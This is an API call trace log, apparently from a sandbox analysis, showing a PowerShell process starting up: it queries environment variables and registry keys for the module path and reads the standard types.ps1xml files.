	[0724.361] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.361] CoTaskMemFree (pv=0x1f3950) 
	[0725.841] WinSqmIsOptedIn () returned 0x0
	[0725.843] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.843] CoTaskMemFree (pv=0x1f3950) 
	[0725.845] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.845] CoTaskMemFree (pv=0x1f3950) 
	[0725.847] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.847] CoTaskMemFree (pv=0x1f3950) 
	[0725.850] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.850] CoTaskMemFree (pv=0x1f3950) 
	[0725.851] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.851] CoTaskMemFree (pv=0x1f3950) 
	[0725.864] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.864] CoTaskMemFree (pv=0x1f3950) 
	[0725.865] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.865] CoTaskMemFree (pv=0x1f3950) 
	[0725.865] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.865] CoTaskMemFree (pv=0x1f3950) 
	[0725.868] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.868] CoTaskMemFree (pv=0x1f3950) 
	[0725.875] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.875] CoTaskMemFree (pv=0x1f3950) 
	[0725.875] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0725.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.876] CoTaskMemFree (pv=0x1f3950) 
	[0727.546] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0727.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.546] CoTaskMemFree (pv=0x1f3950) 
	[0734.362] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0734.362] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0734.362] CoTaskMemFree (pv=0x1f3950) 
	[0734.368] CoTaskMemAlloc (cb=0xcc) returned 0x299300
	[0734.368] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x299300, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0734.369] CoTaskMemFree (pv=0x299300) 
	[0734.369] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd668 | out: phkResult=0xcd668*=0x30c) returned 0x0
	[0734.369] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd5ec, lpData=0x0, lpcbData=0xcd5e8*=0x0 | out: lpType=0xcd5ec*=0x2, lpData=0x0, lpcbData=0xcd5e8*=0x6c) returned 0x0
	[0734.369] CoTaskMemAlloc (cb=0x70) returned 0x236b30
	[0734.369] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd5bc, lpData=0x236b30, lpcbData=0xcd5b8*=0x6c | out: lpType=0xcd5bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd5b8*=0x6c) returned 0x0
	[0734.369] CoTaskMemFree (pv=0x236b30) 
	[0734.369] CoTaskMemAlloc (cb=0xcc) returned 0x299300
	[0734.369] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x299300, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0734.369] CoTaskMemFree (pv=0x299300) 
	[0734.369] CoTaskMemAlloc (cb=0xcc) returned 0x299300
	[0734.369] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x299300, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0734.369] CoTaskMemFree (pv=0x299300) 
	[0734.374] RegCloseKey (hKey=0x30c) returned 0x0
	[0734.374] CoTaskMemAlloc (cb=0xcc) returned 0x299300
	[0734.374] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x299300, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0734.374] CoTaskMemFree (pv=0x299300) 
	[0734.374] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd668 | out: phkResult=0xcd668*=0x30c) returned 0x0
	[0734.374] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd5ec, lpData=0x0, lpcbData=0xcd5e8*=0x0 | out: lpType=0xcd5ec*=0x0, lpData=0x0, lpcbData=0xcd5e8*=0x0) returned 0x2
	[0734.374] RegCloseKey (hKey=0x30c) returned 0x0
	[0734.380] CoTaskMemAlloc (cb=0x20c) returned 0x28ae20
	[0734.380] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x28ae20 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0734.381] CoTaskMemFree (pv=0x28ae20) 
	[0734.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0734.383] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0735.800] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0735.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.800] CoTaskMemFree (pv=0x1f3950) 
	[0735.803] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0735.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.803] CoTaskMemFree (pv=0x1f3950) 
	[0735.814] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0735.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.814] CoTaskMemFree (pv=0x1f3950) 
	[0735.814] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0735.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.814] CoTaskMemFree (pv=0x1f3950) 
	[0735.816] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd458 | out: phkResult=0xcd458*=0x314) returned 0x0
	[0735.817] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0xcd46c, lpData=0x0, lpcbData=0xcd468*=0x0 | out: lpType=0xcd46c*=0x1, lpData=0x0, lpcbData=0xcd468*=0x74) returned 0x0
	[0735.817] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0xcd3dc, lpData=0x0, lpcbData=0xcd3d8*=0x0 | out: lpType=0xcd3dc*=0x1, lpData=0x0, lpcbData=0xcd3d8*=0x74) returned 0x0
	[0735.818] CoTaskMemAlloc (cb=0x78) returned 0x236b30
	[0735.818] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0xcd3ac, lpData=0x236b30, lpcbData=0xcd3a8*=0x74 | out: lpType=0xcd3ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd3a8*=0x74) returned 0x0
	[0735.818] CoTaskMemFree (pv=0x236b30) 
	[0735.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0735.818] SetErrorMode (uMode=0x1) returned 0x1
	[0735.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd330 | out: lpFileInformation=0xcd330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0735.818] SetErrorMode (uMode=0x1) returned 0x1
	[0735.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0735.819] SetErrorMode (uMode=0x1) returned 0x1
	[0735.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd330 | out: lpFileInformation=0xcd330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0735.819] SetErrorMode (uMode=0x1) returned 0x1
	[0735.821] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0735.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.821] CoTaskMemFree (pv=0x1f3950) 
	[0735.822] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0735.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0735.822] CoTaskMemFree (pv=0x1f3950) 
	[0735.823] GetACP () returned 0x4e4
	[0735.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0735.832] SetErrorMode (uMode=0x1) returned 0x1
	[0735.833] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0735.834] GetFileType (hFile=0x318) returned 0x1
	[0735.834] SetErrorMode (uMode=0x1) returned 0x1
	[0735.834] GetFileType (hFile=0x318) returned 0x1
	[0737.314] ReadFile (in: hFile=0x318, lpBuffer=0x2d0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d0da68*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0737.317] ReadFile (in: hFile=0x318, lpBuffer=0x2d0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d0da68*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0737.317] ReadFile (in: hFile=0x318, lpBuffer=0x2d0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d0da68*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0737.318] ReadFile (in: hFile=0x318, lpBuffer=0x2d0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d0da68*, lpNumberOfBytesRead=0xcd268*=0xcf3, lpOverlapped=0x0) returned 1
	[0737.318] ReadFile (in: hFile=0x318, lpBuffer=0x2d0cec3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d0cec3*, lpNumberOfBytesRead=0xcd268*=0x0, lpOverlapped=0x0) returned 1
	[0737.318] ReadFile (in: hFile=0x318, lpBuffer=0x2d0da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d0da68*, lpNumberOfBytesRead=0xcd268*=0x0, lpOverlapped=0x0) returned 1
	[0737.320] CloseHandle (hObject=0x318) returned 1
	[0737.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0737.323] SetErrorMode (uMode=0x1) returned 0x1
	[0737.323] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd1e0 | out: lpFileInformation=0xcd1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0737.323] SetErrorMode (uMode=0x1) returned 0x1
	[0737.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0737.325] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2c8 | out: phkResult=0xcd2c8*=0x318) returned 0x0
	[0737.325] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd24c, lpData=0x0, lpcbData=0xcd248*=0x0 | out: lpType=0xcd24c*=0x1, lpData=0x0, lpcbData=0xcd248*=0x56) returned 0x0
	[0737.325] CoTaskMemAlloc (cb=0x5a) returned 0x2a5d30
	[0737.325] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd21c, lpData=0x2a5d30, lpcbData=0xcd218*=0x56 | out: lpType=0xcd21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd218*=0x56) returned 0x0
	[0737.325] CoTaskMemFree (pv=0x2a5d30) 
	[0737.325] RegCloseKey (hKey=0x318) returned 0x0
	[0737.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0737.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0738.699] VirtualQuery (in: lpAddress=0xcbfb0, lpBuffer=0xcce70, dwLength=0x30 | out: lpBuffer=0xcce70*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0738.710] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0738.710] GetFileType (hFile=0x318) returned 0x1
	[0738.711] SetErrorMode (uMode=0x1) returned 0x1
	[0738.711] GetFileType (hFile=0x318) returned 0x1
	[0738.711] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.711] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.712] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.713] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.713] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.714] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.715] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.715] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.715] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.717] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.717] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.717] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.718] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.718] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.719] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.719] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.719] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.722] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.722] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.722] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.723] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.723] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.723] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.724] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.724] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.724] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.725] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0738.725] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.229] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.230] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.230] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
	[0740.230] ReadFile (in: hFile=0x318, lpBuffer=0x2d74c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd268, lpOverlapped=0x0 | out: lpBuffer=0x2d74c28*, lpNumberOfBytesRead=0xcd268*=0x1000, lpOverlapped=0x0) returned 1
